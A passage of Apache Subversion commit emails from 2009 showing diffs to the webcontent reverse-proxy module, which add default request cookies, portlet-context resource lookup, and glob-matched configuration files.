portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java?rev=822629&r1=822628&r2=822629&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java Wed Oct 7 09:19:36 2009 @@ -31,16 +31,25 @@ private String name; private String localBasePath; private String remoteBaseURL; + private Map<String, String> defaultRequestHeaders; + private Map<String, String> defaultRequestCookies; private int hash; - public DefaultHttpReverseProxyPathMapperImpl(String name, String localBasePath, String remoteBaseURL, Map<String, String> defaultRequestHeaders) + public DefaultHttpReverseProxyPathMapperImpl(String name, String localBasePath, String remoteBaseURL) + { + this(name, localBasePath, remoteBaseURL, null, null); + } + + public DefaultHttpReverseProxyPathMapperImpl(String name, String localBasePath, String remoteBaseURL, Map<String, String> defaultRequestHeaders, Map<String, String> defaultRequestCookies) { this.name = name; this.localBasePath = localBasePath; this.remoteBaseURL = remoteBaseURL; this.defaultRequestHeaders = defaultRequestHeaders; + this.defaultRequestCookies = defaultRequestCookies; + hash = new StringBuilder(40).append(name).append(':').append(localBasePath).append(':').append(remoteBaseURL).toString().hashCode(); } @@ -84,6 +93,11 @@ return defaultRequestHeaders; } + public Map<String, String> getDefaultRequestCookies() + { + return defaultRequestCookies; + } + @Override public int hashCode() { Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java?rev=822629&r1=822628&r2=822629&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java Wed Oct 7 09:19:36 2009 @@ -219,7 +219,8 @@ new DefaultHttpReverseProxyPathMapperImpl(proxyPathMapper.getName() + ":" + localBasePath, localBasePath, remoteBaseURL, - proxyPathMapper.getDefaultRequestHeaders()); + proxyPathMapper.getDefaultRequestHeaders(), + proxyPathMapper.getDefaultRequestCookies()); RewriterController rewriterController = rewriterControllerMap.get(proxyPathMapper); Ruleset rewriterRules = rewriterRulesetMap.get(proxyPathMapper); @@ -314,7 +315,8 @@ new DefaultHttpReverseProxyPathMapperImpl(proxyPathMapper.getName() + ":" + localBasePath, localBasePath, remoteBaseURL, - proxyPathMapper.getDefaultRequestHeaders()); + proxyPathMapper.getDefaultRequestHeaders(), + proxyPathMapper.getDefaultRequestCookies()); RewriterController rewriterController = rewriterControllerMap.get(proxyPathMapper); Ruleset rewriterRules = rewriterRulesetMap.get(proxyPathMapper); Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java?rev=822629&r1=822628&r2=822629&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java Wed Oct 7 09:19:36 2009 @@ -186,8 +186,22 @@ } } + Map<String, String> defaultRequestCookies = null; + Configuration defaultRequestCookiesConf = pathPassConf.subset("request.cookie"); + if (!defaultRequestCookiesConf.isEmpty()) + { + defaultRequestCookies = new HashMap<String, String>(); + + for (Iterator it = defaultRequestCookiesConf.getKeys(); it.hasNext(); ) + { + String key = (String) it.next(); + defaultRequestCookies.put(key, defaultRequestCookiesConf.getString(key)); + } + } + HttpReverseProxyPathMapper proxyPathMapper = - new DefaultHttpReverseProxyPathMapperImpl(pathName, localBasePath, remoteBaseURL, defaultRequestHeaders); + new DefaultHttpReverseProxyPathMapperImpl(pathName, localBasePath, remoteBaseURL, + defaultRequestHeaders, defaultRequestCookies); proxyPathMappers.add(proxyPathMapper); Configuration rewritersConf = pathPassConf.subset("rewriter"); Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java?rev=822629&r1=822628&r2=822629&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java Wed Oct 7 09:19:36 2009 @@ -44,6 +44,7 @@ import org.apache.http.auth.AuthScope; import org.apache.http.auth.Credentials; import org.apache.http.auth.UsernamePasswordCredentials; +import org.apache.http.client.CookieStore; import org.apache.http.client.entity.UrlEncodedFormEntity; import org.apache.http.client.methods.HttpDelete; import org.apache.http.client.methods.HttpGet; @@ -62,6 +63,7 @@ import org.apache.http.entity.InputStreamEntity; import org.apache.http.impl.client.DefaultHttpClient; import org.apache.http.impl.conn.tsccm.ThreadSafeClientConnManager; +import org.apache.http.impl.cookie.BasicClientCookie; import org.apache.http.message.BasicNameValuePair; import org.apache.http.params.BasicHttpParams; import org.apache.http.params.HttpParams; @@ -334,6 +336,21 @@ } } + CookieStore cookieStore = httpClient.getCookieStore(); + + if (cookieStore != null) + { + Map<String, String> defaultRequestCookies = proxyPathMapper.getDefaultRequestCookies(); + + if (defaultRequestCookies != null) + { + for (Map.Entry<String, String> entry : defaultRequestCookies.entrySet()) + { + cookieStore.addCookie(new BasicClientCookie(entry.getKey(), entry.getValue())); + } + } + } + HttpEntity httpEntity = null; try Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java?rev=822629&r1=822628&r2=822629&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java Wed Oct 7 09:19:36 2009 @@ -23,12 +23,16 @@ import java.net.URI; import java.net.URL; +import javax.portlet.PortletContext; import javax.servlet.ServletContext; import org.apache.commons.lang.StringUtils; /** * WebResourceUtils + * <P> + * This utility provides methods to retrieve web resources from classpath, servlet/portlet context or file system. + * </P> * * @version $Id$ */ @@ -39,6 +43,75 @@ { } + public static URL getResource(String resourcePath) + { + return getResource(resourcePath, null, null); + } + + public static URL getResource(String resourcePath, ClassLoader classloader) + { + return getResource(resourcePath, classloader, null); + } + + public static URL getResource(String resourcePath, Object context) + { + return getResource(resourcePath, null, context); + } + + public static URL getResource(String resourcePath, ClassLoader classloader, Object context) + { + if (resourcePath == null) + { + return null; + } + + try + { + if (StringUtils.startsWith(resourcePath, "file:")) + { + File file = new File(URI.create(resourcePath)); + + if (file.exists()) + { + return file.toURL(); + } + } + else if (classloader != null && StringUtils.startsWith(resourcePath, "classpath:")) + { + return classloader.getResource(resourcePath.substring(10)); + } + else if (context != null) + { + if (context instanceof ServletContext) + { + return ((ServletContext) context).getResource(resourcePath); + } + else if (context instanceof PortletContext) + { + return ((PortletContext) context).getResource(resourcePath); + } + else + { + throw new IllegalArgumentException("The context should be either servlet context or portlet context."); + } + } + else + { + File file = new File(resourcePath); + + if (file.exists()) + { + return file.toURL(); + } + } + } + catch (Exception ignore) + { + } + + return null; + } + public static File getResourceAsFile(String resourcePath) { return getResourceAsFile(resourcePath, null, null); @@ -49,23 +122,25 @@ return getResourceAsFile(resourcePath, classloader, null); } - public static File getResourceAsFile(String resourcePath, ServletContext servletContext) + public static File getResourceAsFile(String resourcePath, Object context) { - return getResourceAsFile(resourcePath, null, servletContext); + return getResourceAsFile(resourcePath, null, context); } - public static File getResourceAsFile(String resourcePath, ClassLoader classloader, ServletContext servletContext) + public static File getResourceAsFile(String resourcePath, ClassLoader classloader, Object context) { if (resourcePath == null) { return null; } + File file = null; + try { if (StringUtils.startsWith(resourcePath, "file:")) { - return new File(URI.create(resourcePath)); + file = new File(URI.create(resourcePath)); } else if (classloader != null && StringUtils.startsWith(resourcePath, "classpath:")) { @@ -73,23 +148,34 @@ if (resourceURL != null && "file".equals(resourceURL.getProtocol())) { - return new File(resourceURL.toURI()); + file = new File(resourceURL.toURI()); } } - else if (servletContext != null) + else if (context != null) { - return new File(servletContext.getRealPath(resourcePath)); + if (context instanceof ServletContext) + { + file = new File(((ServletContext) context).getRealPath(resourcePath)); + } + else if (context instanceof PortletContext) + { + file = new File(((PortletContext) context).getRealPath(resourcePath)); + } + else + { + throw new IllegalArgumentException("The context should be either servlet context or portlet context."); + } } else { - return new File(resourcePath); + file = new File(resourcePath); } } catch (Exception ignore) { } - return null; + return ((file != null && file.exists()) ? file : null); } public static InputStream getResourceAsStream(String resourcePath) throws IOException @@ -102,12 +188,12 @@ return getResourceAsStream(resourcePath, classloader, null); } - public static InputStream getResourceAsStream(String resourcePath, ServletContext servletContext) throws IOException + public static InputStream getResourceAsStream(String resourcePath, Object context) throws IOException { - return getResourceAsStream(resourcePath, null, servletContext); + return getResourceAsStream(resourcePath, null, context); } - public static InputStream getResourceAsStream(String resourcePath, ClassLoader classloader, ServletContext servletContext) throws IOException + public static InputStream getResourceAsStream(String resourcePath, ClassLoader classloader, Object context) throws IOException { if (resourcePath == null) { @@ -122,9 +208,20 @@ { return classloader.getResourceAsStream(resourcePath.substring(10)); } - else if (servletContext != null) + else if (context != null) { - return servletContext.getResourceAsStream(resourcePath); + if (context instanceof ServletContext) + { + return ((ServletContext) context).getResourceAsStream(resourcePath); + } + else if (context instanceof PortletContext) + { + return ((PortletContext) context).getResourceAsStream(resourcePath); + } + else + { + throw new IllegalArgumentException("The context should be either servlet context or portlet context."); + } } else { Modified: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java?rev=822629&r1=822628&r2=822629&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java Wed Oct 7 09:19:36 2009 @@ -43,13 +43,13 @@ Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap = new HashMap<HttpReverseProxyPathMapper, RewriterController>(); Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap = new HashMap<HttpReverseProxyPathMapper, Ruleset>(); List<HttpReverseProxyPathMapper> proxyPathMappers = new ArrayList<HttpReverseProxyPathMapper>(); - proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/", null)); - proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost1", "/localhost/path1/", "http://www.localhost.com/path1/", null)); - proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost2", "/localhost/path1/path2/", "http://www.localhost.com/path1/path2/", null)); - proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("apache0", "/apache/", "http://apache.org/", null)); - proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/", null)); - proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("secure_apache", "/secure/*_apache/", "https://$1.apache.org/", null)); - proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("google", "/*.google.*/", "http://$1.google.$2/", null)); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/")); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost1", "/localhost/path1/", "http://www.localhost.com/path1/")); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost2", "/localhost/path1/path2/", "http://www.localhost.com/path1/path2/")); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("apache0", "/apache/", "http://apache.org/")); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/")); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("secure_apache", "/secure/*_apache/", "https://$1.apache.org/")); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("google", "/*.google.*/", "http://$1.google.$2/")); pathMapperProvider = new DefaultHttpReverseProxyPathMapperProviderImpl(proxyPathMappers, rewriterControllerMap, rewriterRulesetMap); pathMapperProvider.setMaxMatchingPathPartCount(3); } Modified: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java?rev=822629&r1=822628&r2=822629&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java Wed Oct 7 09:19:36 2009 @@ -70,10 +70,10 @@ @Override public void setUp() { - apacheProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/", null); - apache0ProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("apache0", "/apache/", "http://apache.org/", null); - securedApacheProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("secure_apache", "/secure/*_apache/", "https://$1.apache.org/", null); - localhostProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/", null); + apacheProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/"); + apache0ProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("apache0", "/apache/", "http://apache.org/"); + securedApacheProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("secure_apache", "/secure/*_apache/", "https://$1.apache.org/"); + localhostProxyPathMapper = new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/"); Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap = new HashMap<HttpReverseProxyPathMapper, RewriterController>(); Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap = new HashMap<HttpReverseProxyPathMapper, Ruleset>(); Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties?rev=822629&r1=822628&r2=822629&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties (original) +++ portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Wed Oct 7 09:19:36 2009 @@ -126,3 +126,4 @@ proxy.reverse.pass.somewhere.rewriter.rules = /WEB-INF/conf/default-rewriter-rules.xml proxy.reverse.pass.somewhere.request.header.Accept-Language = en proxy.reverse.pass.somewhere.request.header.X-Custom-Header = A custom value +proxy.reverse.pass.somewhere.request.cookie.CustomCookie = A value From [email protected] Wed Oct 07 09:48:40 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67388 invoked from network); 7 Oct 2009 09:48:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Oct 2009 09:48:40 -0000 Received: (qmail 97951 invoked by uid 500); 7 Oct 2009 09:48:40 -0000 Delivered-To: [email protected] Received: (qmail 97925 invoked by uid 500); 7 Oct 2009 09:48:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97915 invoked by uid 99); 7 Oct 2009 09:48:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Oct 2009 09:48:40 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Oct 2009 09:48:29 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 4C1EC2388874; Wed, 7 Oct 2009 09:48:08 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r822636 - /portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Date: Wed, 07 Oct 2009 09:48:08 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: woonsan Date: Wed Oct 7 09:48:07 2009 New Revision: 822636 URL: http://svn.apache.org/viewvc?rev=822636&view=rev Log: APA-17: Makes the configuration easy by separating route keys and pass mapping keys. It also allows "include" other properties files. Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties?rev=822636&r1=822635&r2=822636&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties (original) +++ portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Wed Oct 7 09:48:07 2009 @@ -43,15 +43,16 @@ # HTTP Connection parameters per route. # ... If you don't specify here for a route, then the default values are applied. # ... Put the route item names here. -proxy.http.route = apache, somewhere proxy.http.route.param.defaultMaxPerRoute = 20 -# ... Sets detail attirbutes for each route item. - +# ... Sets detail attirbutes for apache route +proxy.http.route = apache proxy.http.route.apache.target.hostname = www.apache.org proxy.http.route.apache.maxConnections = 40 # ... 'somewhere' is just an example to show the full configurable items... +# ... Sets detail attirbutes for 'somewhere' route +proxy.http.route = somewhere proxy.http.route.somewhere.target.hostname = somewhere.localhost.com proxy.http.route.somewhere.target.port = 8080 proxy.http.route.somewhere.maxConnections = 5 @@ -74,8 +75,8 @@ # ... Set max matching path part count proxy.reverse.pass.maxMatchingPathPartCount = 2 -# ... Sets detail attributes for each path item. - +# ... Sets detail attributes for apache path mapping +proxy.reverse.pass = apache proxy.reverse.pass.apache.local = /apache/ proxy.reverse.pass.apache.remote = http://apache.org/ proxy.reverse.pass.apache.rewriter.basic = org.apache.portals.applications.webcontent.rewriter.WebContentRewriter @@ -84,6 +85,8 @@ proxy.reverse.pass.apache.rewriter.parserAdaptor.html.mimeType = text/html proxy.reverse.pass.apache.rewriter.parserAdaptor.html.property.lookUpAllMappings = true +# ... Sets detail attributes for glob-based apache path mapping +proxy.reverse.pass = all_apache proxy.reverse.pass.all_apache.local = /*_apache/ proxy.reverse.pass.all_apache.remote = http://$1.apache.org/ proxy.reverse.pass.all_apache.rewriter.basic = org.apache.portals.applications.webcontent.rewriter.WebContentRewriter @@ -92,6 +95,8 @@ proxy.reverse.pass.all_apache.rewriter.parserAdaptor.html.mimeType = text/html proxy.reverse.pass.all_apache.rewriter.parserAdaptor.html.property.lookUpAllMappings = true +# ... Sets detail attributes for secure apache path mapping +proxy.reverse.pass = secure_apache proxy.reverse.pass.secure_apache.local = /secure/apache/ proxy.reverse.pass.secure_apache.remote = https://apache.org/ proxy.reverse.pass.secure_apache.rewriter.basic = org.apache.portals.applications.webcontent.rewriter.WebContentRewriter @@ -100,6 +105,8 @@ proxy.reverse.pass.secure_apache.rewriter.parserAdaptor.html.mimeType = text/html proxy.reverse.pass.secure_apache.rewriter.parserAdaptor.html.property.lookUpAllMappings = true +# ... Sets detail attributes for glob-based secure apache path mapping +proxy.reverse.pass = all_secure_apache proxy.reverse.pass.all_secure_apache.local = /secure/*_apache/ proxy.reverse.pass.all_secure_apache.remote = https://$1.apache.org/ proxy.reverse.pass.all_secure_apache.rewriter.basic = org.apache.portals.applications.webcontent.rewriter.WebContentRewriter @@ -108,10 +115,14 @@ proxy.reverse.pass.all_secure_apache.rewriter.parserAdaptor.html.mimeType = text/html proxy.reverse.pass.all_secure_apache.rewriter.parserAdaptor.html.property.lookUpAllMappings = true -proxy.reverse.pass.localhost.local = /localhost/ -proxy.reverse.pass.localhost.remote = http://localhost:8080/ +# ... Sets detail attributes for localhost path mapping +proxy.reverse.pass = localhost +proxy.reverse.pass.localhost.local = /localhost_*/ +proxy.reverse.pass.localhost.remote = http://localhost:$1/ +# ... Sets detail attributes for apache path mapping # ... 'somewhere' is just an example to show the full configurable items... +proxy.reverse.pass = somewhere proxy.reverse.pass.somewhere.local = /somewhere/ proxy.reverse.pass.somewhere.remote = http://somewhere.localhost.com/ # ... rewriter configuration for this pass mapping on html and xml types. From [email protected] Wed Oct 07 10:51:13 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82962 invoked from network); 7 Oct 2009 10:51:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Oct 2009 10:51:13 -0000 Received: (qmail 10734 invoked by uid 500); 7 Oct 2009 10:51:13 -0000 Delivered-To: [email protected] Received: (qmail 10711 invoked by uid 500); 7 Oct 2009 10:51:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10701 invoked by uid 99); 7 Oct 2009 10:51:12 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Oct 2009 10:51:12 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Oct 2009 10:51:09 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id C98FB238888F; Wed, 7 Oct 2009 10:50:47 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r822653 - in /portals/applications/webcontent/trunk: webcontent-jar/ webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/ webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/ webconten... Date: Wed, 07 Oct 2009 10:50:47 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: woonsan Date: Wed Oct 7 10:50:47 2009 New Revision: 822653 URL: http://svn.apache.org/viewvc?rev=822653&view=rev Log: APA-17: Allows glob expression in setting reverse proxy configuration files. Modified: portals/applications/webcontent/trunk/webcontent-jar/pom.xml portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/web.xml Modified: portals/applications/webcontent/trunk/webcontent-jar/pom.xml URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/pom.xml?rev=822653&r1=822652&r2=822653&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/pom.xml (original) +++ portals/applications/webcontent/trunk/webcontent-jar/pom.xml Wed Oct 7 10:50:47 2009 @@ -45,6 +45,7 @@ <commons-httpclient.version>3.0.1</commons-httpclient.version> <commons-beanutils.version>1.8.0</commons-beanutils.version> <commons-configuration.version>1.6</commons-configuration.version> + <oro.version>2.0.8</oro.version> </properties> <!-- Dependencies --> @@ -174,6 +175,11 @@ </exclusions> </dependency> <dependency> + <groupId>oro</groupId> + <artifactId>oro</artifactId> + <version>${oro.version}</version> + </dependency> + <dependency> <groupId>org.slf4j</groupId> <artifactId>slf4j-log4j12</artifactId> <version>${slf4j.version}</version> Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java?rev=822653&r1=822652&r2=822653&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java Wed Oct 7 10:50:47 2009 @@ -692,11 +692,11 @@ if (configResourcePath == null) { - configResourcePath = "/WEB-INF/conf/reverseproxy.properties"; + configResourcePath = "/WEB-INF/conf/reverseproxy*.properties"; } - File configResourceFile = - WebResourceUtils.getResourceAsFile(configResourcePath, Thread.currentThread().getContextClassLoader(), getServletContext()); + File [] configResourceFiles = + WebResourceUtils.getResourcesAsFiles(configResourcePath, Thread.currentThread().getContextClassLoader(), getServletContext()); InputStream configInput = null; @@ -704,9 +704,12 @@ { configuration = new PropertiesConfiguration(); - if (configResourceFile != null) + if (configResourceFiles != null && configResourceFiles.length > 0) { - configuration.load(configResourceFile); + for (File configResourceFile : configResourceFiles) + { + configuration.load(configResourceFile); + } if (configReloadingStrategy != null) { @@ -715,7 +718,7 @@ } else { - configInput = WebResourceUtils.getResourceAsStream(configResourcePath.substring(10)); + configInput = WebResourceUtils.getResourceAsStream(configResourcePath, Thread.currentThread().getContextClassLoader(), getServletContext()); configuration.load(configInput); } } Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java?rev=822653&r1=822652&r2=822653&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/WebResourceUtils.java Wed Oct 7 10:50:47 2009 @@ -18,6 +18,7 @@ import java.io.File; import java.io.FileInputStream; +import java.io.FilenameFilter; import java.io.IOException; import java.io.InputStream; import java.net.URI; @@ -27,6 +28,7 @@ import javax.servlet.ServletContext; import org.apache.commons.lang.StringUtils; +import org.apache.oro.io.GlobFilenameFilter; /** * WebResourceUtils @@ -155,11 +157,21 @@ { if (context instanceof ServletContext) { - file = new File(((ServletContext) context).getRealPath(resourcePath)); + String realPath = ((ServletContext) context).getRealPath(resourcePath); + + if (realPath != null) + { + file = new File(realPath); + } } else if (context instanceof PortletContext) { - file = new File(((PortletContext) context).getRealPath(resourcePath)); + String realPath = ((PortletContext) context).getRealPath(resourcePath); + + if (realPath != null) + { + file = new File(realPath); + } } else { @@ -175,7 +187,30 @@ { } - return ((file != null && file.exists()) ? file : null); + return file; + } + + public static File [] getResourcesAsFiles(String resourcePath) + { + return getResourcesAsFiles(resourcePath, null, null); + } + + public static File [] getResourcesAsFiles(String resourcePath, ClassLoader classloader) + { + return getResourcesAsFiles(resourcePath, classloader, null); + } + + public static File [] getResourcesAsFiles(String resourcePath, Object context) + { + return getResourcesAsFiles(resourcePath, null, context); + } + + public static File [] getResourcesAsFiles(String resourcePath, ClassLoader classloader, Object context) + { + File file = 